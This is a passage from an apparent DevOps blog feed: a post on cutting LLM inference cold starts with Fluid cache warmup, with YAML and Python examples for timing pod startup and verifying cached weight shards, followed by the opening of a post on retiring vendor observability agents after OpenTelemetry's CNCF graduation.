<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li>A modern LLM serving pod has to pull tens of GB of model weights before it can answer a single request. That pull is the cold-start. The GPU is sitting idle the whole time.</li>
<li>Direct pulls from object storage across a region are bandwidth-and-latency bound. 42 minutes is what you get if you assume cloud-native means &quot;let the storage layer handle it.&quot;</li>
<li>A naive Alluxio cache in front of the storage cuts that by 3x, which is still not enough.</li>
<li>Fluid is a CNCF project (incubating) that wraps Alluxio (or JindoCache, or JuiceFS) with a dataset CRD, scheduled prefetch workflows, and CSI/sidecar injection. The wrapper is the value, not the cache.</li>
<li>The last 10x came from proactive warmup, treating the dataset as a workload to schedule rather than a side concern.</li>
<li>You can apply most of this pattern without Fluid if you are not on Kubernetes. The principles are: place the cache on the inference node, warm the cache before the pod starts, and treat model weights as a first-class artifact, not a runtime dependency.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A workload where cold-start matters. Production inference, autoscaling LLM endpoints, serverless GPU jobs.</li>
<li>Models in the 10-100GB range. The numbers below scale linearly with weight size.</li>
<li>Familiarity with Kubernetes manifests and PV/PVC if you want to apply Fluid directly. The principles section at the end is K8s-agnostic.</li>
</ul>
<h2 id="h2-why-the-cold-start-is-42-minutes-in-the-first-place" class="group relative scroll-mt-24">
        <a href="#h2-why-the-cold-start-is-42-minutes-in-the-first-place" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why the cold start is 42 minutes in the first place
        </a>
        </h2><p>A serverless LLM endpoint goes through this on every scale-up:</p>
<ol>
<li>Scheduler places a pod on a node with a free GPU.</li>
<li>Container image pulls (a few GB if you&#39;re disciplined, 20+ GB if you&#39;ve bundled CUDA libraries badly).</li>
<li>The container starts, the runtime initializes, and the model loading code tries to open the weights.</li>
<li>The weights are not on the local disk. They are in S3, GCS, or an internal object store, maybe in a different region from the GPU node.</li>
<li>The model loader streams 30-60 GB across that network link, decodes the shards, and copies them into GPU memory.</li>
<li>First request can finally be served.</li>
</ol>
<p>The cross-region throughput on cloud object storage is realistically 200-400 MB/s sustained from a single client. A 60 GB model at 300 MB/s is 3.5 minutes if everything goes perfectly. In practice, you also get retries, redirect overhead, multi-shard sequential reads, and the model loader doing extra work (verifying checksums, building a tokenizer&#39;s vocab, allocating GPU memory in chunks). 42 minutes is the realistic worst case when the model is on the other side of a continent and nobody has thought about warming a cache.</p>
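<p>To see which of the scale-up phases above dominates on a real pod, the following added example (not code from NetEase, Fluid, or the original post) splits a cold start into image pull, container start, and weight load using timestamps Kubernetes already records. The function names and sample data are constructed for illustration, and it assumes the readiness probe only passes once the model is loaded.</p>

```python
"""Added example: split a pod's cold start into phases from Kubernetes timestamps."""
from datetime import datetime

# Constructed sample, shaped like the items from `kubectl get events -o json`.
# Scheduler events may carry only eventTime; kubelet events carry firstTimestamp.
CONSTRUCTED_EVENTS = [
    {"reason": "Scheduled", "firstTimestamp": None,
     "eventTime": "2026-05-26T10:00:00.000000Z"},
    {"reason": "Pulling", "firstTimestamp": "2026-05-26T10:00:02Z"},
    {"reason": "Pulled", "firstTimestamp": "2026-05-26T10:01:32Z"},
    {"reason": "Created", "firstTimestamp": "2026-05-26T10:01:33Z"},
    {"reason": "Started", "firstTimestamp": "2026-05-26T10:01:34Z"},
]

# Constructed sample, shaped like `kubectl get pod <name> -o json`.
CONSTRUCTED_POD = {"status": {"conditions": [
    {"type": "PodScheduled", "status": "True",
     "lastTransitionTime": "2026-05-26T10:00:00Z"},
    {"type": "Ready", "status": "True",
     "lastTransitionTime": "2026-05-26T10:15:34Z"},
]}}


def parse_ts(value: str) -> datetime:
    """Parse an RFC 3339 UTC timestamp as emitted by the Kubernetes API."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def latest_event(events: list, reason: str) -> datetime:
    """Return the latest timestamp among events with the given reason."""
    times = []
    for event in events:
        raw = event.get("firstTimestamp") or event.get("eventTime")
        if event.get("reason") == reason and raw:
            times.append(parse_ts(raw))
    if not times:
        # Events are garbage-collected (one hour by default), so a missing
        # reason usually means the data was captured too late.
        raise ValueError(f"no {reason} event found; capture events sooner")
    return max(times)


def ready_time(pod: dict) -> datetime:
    """Return when the pod last became Ready (misleading if readiness flapped)."""
    for cond in pod["status"].get("conditions", []):
        if cond["type"] == "Ready" and cond["status"] == "True":
            return parse_ts(cond["lastTransitionTime"])
    raise ValueError("pod is not Ready yet")


def cold_start_breakdown(events: list, pod: dict) -> dict:
    """Map each phase to its duration in seconds and its share of the total."""
    scheduled = latest_event(events, "Scheduled")
    pulled = latest_event(events, "Pulled")    # last image (init containers too)
    started = latest_event(events, "Started")  # last container to start
    ready = ready_time(pod)
    seconds = {
        # An image already on the node still emits Pulled, so this is near zero.
        "image_pull": (pulled - scheduled).total_seconds(),
        "container_start": (started - pulled).total_seconds(),
        # Assumption: readiness passes only after weights are in GPU memory.
        "weight_load": (ready - started).total_seconds(),
    }
    total = sum(seconds.values()) or 1.0
    return {
        phase: {"seconds": value, "share": round(value / total, 3)}
        for phase, value in seconds.items()
    }


def dominant_phase(breakdown: dict) -> str:
    """Name the phase that consumed the most wall-clock time."""
    return max(breakdown, key=lambda phase: breakdown[phase]["seconds"])


if __name__ == "__main__":
    result = cold_start_breakdown(CONSTRUCTED_EVENTS, CONSTRUCTED_POD)
    for phase, stats in result.items():
        print(f"{phase:16s} {stats['seconds']:7.0f}s  {stats['share']:.1%}")
    print("dominant:", dominant_phase(result))
```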
<h2 id="h2-bet-1-put-a-cache-layer-in-front-of-object-storage" class="group relative scroll-mt-24">
        <a href="#h2-bet-1-put-a-cache-layer-in-front-of-object-storage" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bet 1: put a cache layer in front of object storage
        </a>
        </h2><p>Step one is the textbook fix. Put <a href="https://www.alluxio.io/">Alluxio</a> (or any distributed cache) in front of your object store. The first pod that wants a model pulls it once; subsequent pods on the cluster get it from the local cache cluster instead of crossing the region.</p>
<p>NetEase measured this at 14 minutes. Still painful, but 3x better. The reason a raw Alluxio cluster doesn&#39;t get you all the way to 30 seconds is that the cache doesn&#39;t know which models to warm. If the first cold-start of the day is what triggers the cache fill, the first user still waits 42 minutes. Every subsequent pod for the same model is fast, but the moment you autoscale to a new model variant or your fleet scales horizontally, you&#39;re back at step one.</p>
<p>The conclusion the team arrived at is the same conclusion every serious LLM inference platform reaches: <strong>caches that are passive are not good enough.</strong> You have to know what you&#39;re going to need and start moving it ahead of time.</p>
<h2 id="h2-bet-2-fluid-as-the-dataset-crd-on-top-of-the-cache" class="group relative scroll-mt-24">
        <a href="#h2-bet-2-fluid-as-the-dataset-crd-on-top-of-the-cache" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bet 2: Fluid as the dataset CRD on top of the cache
        </a>
        </h2><p><a href="https://github.com/fluid-cloudnative/fluid">Fluid</a> is a CNCF incubating project that does something subtle. It treats datasets as Kubernetes-native objects. You declare a <code>Dataset</code> and a <code>Runtime</code> resource, and Fluid orchestrates the cache layer, scheduling, and pod-to-cache binding for you.</p>
<p>A minimal Fluid setup looks like this:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">data.fluid.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Dataset</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">llama-3-70b</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">mounts:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">mountPoint:</span> <span class="hljs-string">s3://models.example/llama-3-70b/</span>
      <span class="hljs-attr">name:</span> <span class="hljs-string">weights</span>
  <span class="hljs-attr">accessModes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">ReadOnlyMany</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">data.fluid.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">AlluxioRuntime</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">llama-3-70b</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">3</span>                   <span class="hljs-comment"># how many cache workers</span>
  <span class="hljs-attr">tieredstore:</span>
    <span class="hljs-attr">levels:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">mediumtype:</span> <span class="hljs-string">SSD</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/mnt/cache</span>
        <span class="hljs-attr">quota:</span> <span class="hljs-string">200Gi</span>
</code></pre><p>Two YAMLs and Fluid spins up a cache cluster on the nodes you specify, mounts the S3 bucket behind it, and exposes a PVC your inference pods can mount as if the weights were already on the local disk. The CSI driver Fluid registers handles the &quot;make this look like a local mount&quot; part.</p>
<p>Where Fluid earns its 14-minute-to-3-minute win is the <strong>prefetch workflow</strong>. You can declare a <code>DataLoad</code> resource that says &quot;warm this dataset into the cache on a schedule&quot; or &quot;warm it whenever a webhook fires&quot;. When a new pod requests the weights, the data is already in the local cache cluster, not still being pulled from S3.</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">data.fluid.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">DataLoad</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">warm-llama</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">dataset:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">llama-3-70b</span>
    <span class="hljs-attr">namespace:</span> <span class="hljs-string">inference</span>
  <span class="hljs-attr">loadMetadata:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">target:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
      <span class="hljs-attr">replicas:</span> <span class="hljs-number">3</span>
</code></pre><p>The 3-minute number is what you get with Fluid orchestrating a warm cache but the pod still doing the actual weight read at startup. The cache is on the same network as the GPU, but the bytes still have to traverse the host network and load into the model loader process.</p>
<h2 id="h2-bet-3-proactive-warmup-treating-data-as-a-workload" class="group relative scroll-mt-24">
        <a href="#h2-bet-3-proactive-warmup-treating-data-as-a-workload" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bet 3: proactive warmup, treating data as a workload
        </a>
        </h2><p>The last 10x is the one that takes engineering judgment. The NetEase post highlights three capabilities Fluid provides for this stage:</p>
<ul>
<li><strong>Scheduled, event-driven, and proactive warmup.</strong> The cache fills before any pod requests it. The warmup itself runs as a workload, with its own resource requests and priority.</li>
<li><strong>CSI- and Sidecar-based access patterns.</strong> Critical for letting an inference pod consume a dataset that lives in a different namespace, without copying or duplicating the data.</li>
<li><strong>Cross-namespace dataset sharing with logical isolation.</strong> One team&#39;s <code>Dataset</code> resource can be referenced by another team&#39;s pods, but with the access controls staying intact.</li>
</ul>
<p>The pattern that gets you to 30 seconds (or under) is to treat model warmup as a deployment concern, not a runtime concern:</p>
<ol>
<li>When you publish a new model version, you also schedule a <code>DataLoad</code> that warms it across the inference cluster&#39;s cache nodes.</li>
<li>The warmup completes before any pod requesting that model is scheduled.</li>
<li>The Kubernetes scheduler co-locates the inference pod with a cache node that has the weights resident.</li>
<li>The pod&#39;s only cold-path is the local-disk read + GPU memory copy, which on modern NVMe + PCIe is a few seconds for tens of GB.</li>
</ol>
<p>The mental shift is from &quot;lazy load on demand&quot; to &quot;the data is already there because we put it there.&quot; This is the same shift CDNs went through in the 2010s. The cache fills are not the user&#39;s problem.</p>
<h2 id="h2-what-the-case-study-doesnt-tell-you" class="group relative scroll-mt-24">
        <a href="#h2-what-the-case-study-doesnt-tell-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the case study doesn't tell you
        </a>
        </h2><p>A few things worth being honest about because the post glosses over them:</p>
<ul>
<li><strong>They didn&#39;t say what model sizes.</strong> &quot;30 seconds&quot; is for some workload they measured. If your model is 7B parameters (~14GB) you&#39;ll do better. If it&#39;s 405B parameters (~800GB), even Fluid can&#39;t make that fit on a single cache node.</li>
<li><strong>They didn&#39;t say what GPU types.</strong> PCIe 4 versus PCIe 5 versus the NVLink-attached HBM on modern accelerators changes the &quot;weight-load-into-GPU-memory&quot; portion of the cold path by 3-5x.</li>
<li><strong>They didn&#39;t share the actual Fluid YAML they run in production.</strong> The snippets above are minimal-viable shapes from Fluid&#39;s docs, not NetEase&#39;s actual config. Production setups have priorities, taints, resource quotas, and observability hooks that aren&#39;t in the case study.</li>
</ul>
<p>That&#39;s normal for an end-user post; the architectural takeaway is what&#39;s portable, not the exact tuning.</p>
<h2 id="h2-how-to-apply-the-pattern-without-fluid" class="group relative scroll-mt-24">
        <a href="#h2-how-to-apply-the-pattern-without-fluid" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to apply the pattern without Fluid
        </a>
        </h2><p>If you&#39;re not on Kubernetes, the principles still transfer:</p>
<ol>
<li><strong>Put the cache on the inference node, not across the network.</strong> Local NVMe reading at 7 GB/s beats network-attached storage at 1-2 GB/s by 3-5x.</li>
<li><strong>Warm the cache before the pod starts.</strong> Tie cache warming to your CI/CD pipeline. When a new model version ships, the deploy step is <code>(a) push weights to object storage</code> AND <code>(b) push a warmup job to every inference region</code>. Both run before any traffic is routed to the new version.</li>
<li><strong>Treat model weights as a first-class artifact.</strong> They are not configuration. They are not a runtime dependency. They are a build artifact with their own versioning, signing, and distribution path. Sign them with the same tooling you use to sign container images (cosign, part of Sigstore, signs arbitrary blobs as well as images).</li>
<li><strong>If you&#39;re on serverless GPU (Modal, RunPod, Beam, Lambda Labs, Cerebrium, Replicate), check the warm-pool feature.</strong> Every credible serverless GPU vendor in 2026 has a &quot;keep N instances pre-loaded&quot; knob. Pay the holding cost; the cold-start fix isn&#39;t worth the engineering time for a workload that hits cold pods a handful of times a day.</li>
<li><strong>Measure where your cold start actually goes.</strong> A simple <code>kubectl describe pod</code> + <code>kubectl logs --previous</code> for a cold-started inference pod will tell you whether you&#39;re 90% on weight load or 90% on image pull. The fix is different for each.</li>
</ol>
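<p>Principles 2 and 3 combine into a warmup gate: the warmup job should only mark a cache as warm when its contents match what was published. The following is an added example, not code from NetEase, Fluid, or the original post. It swaps in a plain SHA-256 manifest for the check; the function names are hypothetical, the shard files are constructed, and it assumes the manifest itself is the small blob you sign and that its signature was already verified (for example with cosign) before <code>verify_cache</code> is called.</p>

```python
"""Added example: gate a weight-cache warmup on a pinned digest manifest."""
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so multi-GB shards never sit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for block in iter(lambda: handle.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(weights_dir: Path, version: str) -> dict:
    """Publish side: record the size and digest of every shard."""
    shards = {}
    for path in sorted(p for p in weights_dir.rglob("*") if p.is_file()):
        rel = path.relative_to(weights_dir).as_posix()
        shards[rel] = {"size": path.stat().st_size, "sha256": sha256_file(path)}
    return {"version": version, "shards": shards}


def verify_cache(cache_dir: Path, manifest: dict) -> list[str]:
    """Warmup side: list every mismatch between the cache and the manifest.

    An empty list means the cache holds exactly the published shards.
    """
    problems = []
    root = cache_dir.resolve()
    expected = manifest["shards"]
    for rel, meta in expected.items():
        target = (root / rel).resolve()
        # A manifest entry (or a symlink) must not lead outside the cache dir.
        if not target.is_relative_to(root):
            problems.append(f"escapes-cache-dir: {rel}")
            continue
        if not target.is_file():
            problems.append(f"missing: {rel}")
            continue
        # Cheap size check first; hash only when the size already matches.
        if target.stat().st_size != meta["size"]:
            problems.append(f"size-mismatch: {rel}")
        elif sha256_file(target) != meta["sha256"]:
            problems.append(f"digest-mismatch: {rel}")
    # Files the publisher never listed are as suspicious as altered ones,
    # because model directories can carry loadable code next to the weights.
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if rel not in expected:
            problems.append(f"unexpected: {rel}")
    return problems


def demo() -> dict:
    """Constructed sample: two tiny files stand in for real weight shards."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        published = Path(tmp) / "published"
        cache = Path(tmp) / "cache"
        for directory in (published, cache):
            directory.mkdir()
            (directory / "model-00001.safetensors").write_bytes(b"A" * 4096)
            (directory / "model-00002.safetensors").write_bytes(b"B" * 4096)
        manifest = build_manifest(published, "v1-constructed")
        results["clean"] = verify_cache(cache, manifest)
        # Same size, different bytes: only the digest comparison catches this.
        (cache / "model-00002.safetensors").write_bytes(b"C" * 4096)
        (cache / "loader_hook.py").write_text("# not in the manifest\n")
        (cache / "model-00001.safetensors").unlink()
        results["tampered"] = verify_cache(cache, manifest)
    return results


if __name__ == "__main__":
    for name, problems in demo().items():
        print(name, problems or "OK: safe to mark the cache warm")
```

<p>Run the check on each cache node after the warmup finishes and before traffic is routed to the new version; a non-empty result should fail the deploy step.</p>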
<h2 id="h2-why-this-matters-beyond-llm-inference" class="group relative scroll-mt-24">
        <a href="#h2-why-this-matters-beyond-llm-inference" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why this matters beyond LLM inference
        </a>
        </h2><p>The same pattern applies anywhere a workload needs a large blob of data to start. Big data jobs reading TB-scale datasets, video transcoders pulling reference assets, simulation workloads that need GIS data, security tools pulling threat intel snapshots. The cost of &quot;lazy load from object storage&quot; goes up linearly with the size of the blob and the distance to it. The cost of &quot;warm cache, locality-aware scheduling&quot; stays flat.</p>
<p>Fluid is doing for data-intensive workloads what Kubernetes already did for compute: making placement, scheduling, and lifecycle into first-class concerns instead of operational accidents. The graduation path the project is on (incubating today, likely graduating in 2027) is worth tracking if any of your workloads cold-start on more than a few hundred MB of data.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>NetEase Games turned a 42-minute inference cold start into 30 seconds by stopping treating model weights as something to lazy-load from object storage at runtime. The CNCF Fluid project gave them the Kubernetes-native primitives (Dataset, Runtime, DataLoad) to make cache warming a deployment concern instead of a runtime gamble. The principles transfer to any large-blob cold-start problem, with or without Kubernetes.</p>
<p>If your LLM endpoint takes more than a minute to come online, the bottleneck is almost certainly weight loading, and the fix is almost certainly cache + locality + proactive warmup. Spend a sprint measuring where the time actually goes, then borrow whichever piece of this pattern matches your stack.</p>
<p>Sources:</p>
<ul>
<li><a href="https://www.cncf.io/blog/2026/05/21/how-netease-games-achieved-30-second-llm-cold-starts-on-kubernetes/">NetEase Games + Fluid case study (CNCF blog)</a></li>
<li><a href="https://github.com/fluid-cloudnative/fluid">Fluid project on GitHub</a></li>
<li><a href="https://www.alluxio.io/">Alluxio docs</a></li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[OpenTelemetry Just Graduated: What to Retire from Your Stack This Quarter]]></title>
      <link>https://devops-daily.com/posts/opentelemetry-graduated-what-to-retire-this-quarter</link>
      <description><![CDATA[On May 21, 2026, CNCF graduated OpenTelemetry. All three core signals (traces, metrics, logs) are now production-ready, the project is the second-most-active in CNCF after Kubernetes itself, and Anthropic, Bloomberg, Capital One, eBay, and Heroku run it at scale. Here is the decision framework for what proprietary agents you can stop running, what is still risky, and the 90-day adoption checklist.]]></description>
      <pubDate>Tue, 26 May 2026 10:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/opentelemetry-graduated-what-to-retire-this-quarter</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[OpenTelemetry]]></category><category><![CDATA[Observability]]></category><category><![CDATA[CNCF]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Kubernetes]]></category>
      <content:encoded><![CDATA[<p>On May 21, 2026, the <a href="https://www.cncf.io/announcements/2026/05/21/cloud-native-computing-foundation-announces-opentelemetrys-graduation-solidifying-status-as-the-de-facto-observability-standard/">Cloud Native Computing Foundation graduated OpenTelemetry</a> at the Observability Summit in Minneapolis. The headline number is that OTel is now the second-most-active project in the CNCF behind Kubernetes itself, with more than 12,000 contributors from 2,800 companies. The numbers most teams should care about are the ones underneath: traces, metrics, and logs are all production-stable as of this graduation. Profiling moved to alpha at the same time.</p>
<p>If your team has been running OpenTelemetry alongside a vendor-specific agent (Datadog Agent, New Relic Agent, Splunk Universal Forwarder, Dynatrace OneAgent, the AWS X-Ray daemon) because &quot;OTel isn&#39;t quite there yet,&quot; the calculus changed last week. This post is the practical version: which proprietary agents you can actually retire, which to keep, and the 90-day rollout plan that gets you to a single OTel Collector shipping to whichever backends your team uses.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li>CNCF graduation criteria require independent security audit, formal governance review, and proven production adoption. OpenTelemetry cleared all three with the third-largest contributor base in cloud-native.</li>
<li>All three core signals (traces, metrics, logs) are now production-ready. Profiles is alpha.</li>
<li>The OTel Collector is the unified shipping layer. You run one collector per host or per cluster, and it fans out to any combination of backends. No more &quot;one agent per vendor&quot;.</li>
<li>Retire candidates: Datadog Agent, New Relic Infrastructure Agent, Splunk Universal Forwarder for logs+metrics, FluentBit/FluentD log-only paths, Prometheus node_exporter scrape pipelines you still own. Each has an OTel equivalent that&#39;s production-stable.</li>
<li>Keep for now: vendor APM auto-instrumentation libraries on languages where OTel&#39;s contrib instrumentation hasn&#39;t caught up (Ruby on Rails edges, older PHP versions), eBPF profilers that depend on vendor-specific kernel modules.</li>
<li>90-day rollout: collector in shadow mode → one signal at a time → kill the proprietary agent → repeat per language runtime.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A cluster or fleet where you can deploy a sidecar/DaemonSet without a change-management committee.</li>
<li>At least one observability vendor account that can ingest OTLP/HTTP or OTLP/gRPC. Every major vendor accepts it now, but verify the endpoint and the auth header before you start a migration.</li>
<li>Inventory of every agent currently running. <code>ps aux | grep -iE &#39;datadog|newrelic|splunkd|fluentd|fluent-bit|otelcol&#39;</code> on one production host gets you a starting list.</li>
</ul>
<h2 id="h2-what-graduation-actually-unlocks" class="group relative scroll-mt-24">
        <a href="#h2-what-graduation-actually-unlocks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What graduation actually unlocks
        </a>
        </h2><p>CNCF graduation is more than a vanity badge. To clear the bar, a project needs to pass an independent security audit, hold a formal governance review with the TOC, and demonstrate widespread production adoption. The full criteria are in CNCF&#39;s <a href="https://github.com/cncf/toc/blob/main/process/graduation_criteria.md">Graduation policy</a>. Projects that have graduated before OTel include Kubernetes, Helm, Prometheus, etcd, and Envoy. The bar is meaningful.</p>
<p>For OpenTelemetry specifically, what changed at graduation is mostly social rather than technical. The bits were already there. Graduation tells your security team, your platform leads, and your CFO that this is a safe project to standardize on. The argument &quot;let&#39;s wait until OTel is more mature&quot; is now formally over. If you&#39;re still running three agents per host to satisfy three teams&#39; tool preferences, the cost-of-status-quo math just shifted.</p>
<p>The most useful technical surface OTel offers is the <a href="https://opentelemetry.io/docs/collector/">Collector</a>. One binary, one config, and it can:</p>
<ul>
<li>Receive traces, metrics, and logs over OTLP (or scrape Prometheus, tail log files, pull host metrics, hook into eBPF).</li>
<li>Process them (sample, batch, redact PII, attach k8s metadata, tail-sample on error).</li>
<li>Export to anywhere. Datadog, New Relic, Splunk, Honeycomb, Grafana Cloud, Tempo, Mimir, Loki, ClickHouse, S3, whatever.</li>
</ul>
<p>The &quot;one collector, many backends&quot; architecture is what makes the retire-the-vendor-agents play work. You&#39;re not removing your observability, you&#39;re removing the layer that locked you to a single ingestion path.</p>
<h2 id="h2-whats-actually-production-stable" class="group relative scroll-mt-24">
        <a href="#h2-whats-actually-production-stable" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What's actually production-stable
        </a>
        </h2><p>The CNCF announcement explicitly named all three core signals as production-ready:</p>
<pre><code class="hljs language-text">Traces       : Stable (since 2023)
Metrics      : Stable (since late 2023)
Logs         : Stable
Profiles     : Alpha (just promoted)
</code></pre><p>The signal-status nuance worth knowing:</p>
<ul>
<li><strong>Traces</strong> were the first to stabilize and are by far the most mature. The auto-instrumentation libraries for Node.js, Python, Java, and .NET are at parity with the closed-source equivalents from APM vendors for most application frameworks. Go and Rust still benefit from manual instrumentation in some hot paths.</li>
<li><strong>Metrics</strong> are stable but have one foot in the Prometheus world. If your team already runs Prometheus servers, OTel metrics give you a way to ship the same metric to Prometheus AND a SaaS without scraping twice. The OTel-Prometheus interop story is solid.</li>
<li><strong>Logs</strong> stabilized later than traces and metrics. The OTel logging SDKs are production-ready, but the ergonomics on existing structured-logger libraries (log/slog in Go, the Python logging module, Java&#39;s Logback) still feel like a wrapper layer. Functional, but if you have a working Fluent Bit pipeline that nobody complains about, the migration ROI is lower than for traces.</li>
<li><strong>Profiles</strong> is alpha and should be treated as such. eBPF-based profilers (Parca, Pyroscope) are still the right choice if continuous profiling is core to your workflow. Revisit in 12 months.</li>
</ul>
<h2 id="h2-retire-from-stack-candidates-ranked-by-roi" class="group relative scroll-mt-24">
        <a href="#h2-retire-from-stack-candidates-ranked-by-roi" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Retire-from-stack candidates, ranked by ROI
        </a>
        </h2><p>These are the proprietary agents where I&#39;d push hardest to replace with the OTel Collector. ROI here is &quot;engineering hours saved per quarter&quot; plus &quot;one-fewer-agent attack surface.&quot;</p>
<h3 id="h3-high-confidence-replace" class="group relative scroll-mt-24">
        <a href="#h3-high-confidence-replace" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          High-confidence: replace
        </a>
        </h3><p><strong>Datadog Agent → OTel Collector + datadog exporter.</strong> Datadog accepts OTLP natively now. The OTel Collector&#39;s <code>datadogexporter</code> is maintained by Datadog and ships traces/metrics/logs into your existing Datadog org. You keep the dashboards, the SLOs, the monitors. You stop running their proprietary agent on every host. Their docs at <a href="https://docs.datadoghq.com/opentelemetry/">https://docs.datadoghq.com/opentelemetry/</a> walk through it.</p>
<p><strong>New Relic Infrastructure Agent → OTel Collector + otlp exporter.</strong> Same shape. New Relic has supported OTLP ingestion for over a year. The cutover is a Collector config + an env var change on your services.</p>
<p><strong>Splunk Universal Forwarder for logs and metrics → OTel Collector + splunk_hec exporter.</strong> Splunk Observability is built on OpenTelemetry internally, and Splunk Enterprise accepts HEC over OTLP. If you&#39;re still running UF on every host for the &quot;send everything to indexer&quot; pattern, the OTel Collector does it with smaller memory and CPU footprint.</p>
<p><strong>FluentBit / FluentD log-only deployments → OTel Collector with filelog receiver.</strong> Slightly more controversial because FluentBit is excellent at what it does and has a smaller binary. The argument is consolidation: if you&#39;re already running an OTel Collector for traces and metrics, adding the filelog receiver removes the second daemon. If you&#39;re not, FluentBit stays the right call.</p>
<p><strong>Prometheus node_exporter + scrape pipeline you maintain → OTel Collector with hostmetrics receiver.</strong> For the case where you&#39;re scraping a fleet you control, the hostmetrics receiver gives you the same dimensions (CPU, memory, disk, network, filesystem) with one less moving part. For the case where you scrape arbitrary apps that expose Prometheus endpoints, keep the scrape; the OTel Collector can do that scraping too.</p>
<h3 id="h3-keep-for-now" class="group relative scroll-mt-24">
        <a href="#h3-keep-for-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Keep for now
        </a>
        </h3><p><strong>Vendor APM auto-instrumentation libraries</strong> on languages where OTel-contrib lags. Ruby on Rails apps that depend on the Datadog <code>dd-trace-rb</code> for AR span enrichment, older PHP 7.x where the OTel PHP SDK is still maturing. The right move is to keep the vendor lib in those services and use the OTel Collector as the egress layer.</p>
<p><strong>eBPF profilers with vendor-specific kernel modules.</strong> Pyroscope and Parca have great OTel integration paths. Datadog&#39;s continuous profiler uses its own kernel hook. If you depend on the Datadog profiler today, OTel profiles being alpha is not enough to switch.</p>
<p><strong>AWS X-Ray daemon</strong> if you&#39;re heavily invested in X-Ray as a backend. AWS accepts OTLP, but X-Ray&#39;s free tier and ECS Fargate-native integration make the X-Ray daemon a defensible choice for AWS-only shops. For multi-cloud, OTel.</p>
<h2 id="h2-the-90-day-rollout-plan" class="group relative scroll-mt-24">
        <a href="#h2-the-90-day-rollout-plan" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The 90-day rollout plan
        </a>
        </h2><p>The pattern that works is the same in every team I&#39;ve seen do this without an incident:</p>
<p><strong>Days 1-14: shadow-mode collector.</strong> Deploy the OTel Collector as a sidecar (per pod) or DaemonSet (per node) alongside your existing agents. Configure it to receive but not export to your production backend yet. A minimal receive-only config, which writes only to the <code>debug</code> exporter:</p>
